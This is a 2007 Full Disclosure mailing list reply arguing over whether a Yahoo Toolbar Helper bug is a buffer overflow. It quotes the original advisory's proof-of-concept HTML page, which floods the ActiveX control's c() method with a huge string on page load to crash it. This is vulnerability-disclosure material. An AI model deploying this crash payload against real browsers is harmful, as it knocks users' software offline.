Full Disclosure mailing list archives
Re: Yahoo Toolbar Helper c() Method Stack Overflow DoS
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Fri, 30 Nov 2007 10:59:37 -0500
Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41 characters. Except for the fact that this again is a stack overflow exception and not a stack based buffer overflow. I implore you, LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad <elazarb () earthlink net> wrote:
There is a stack overflow in the c() method of the Yahoo Toolbar
Helper class. This overflow does not appear to get anywhere near
the EIP or SEH. PoC as follows:
----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-C3F9-4EFB-9B51-7695ECA05670}
obj.c(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
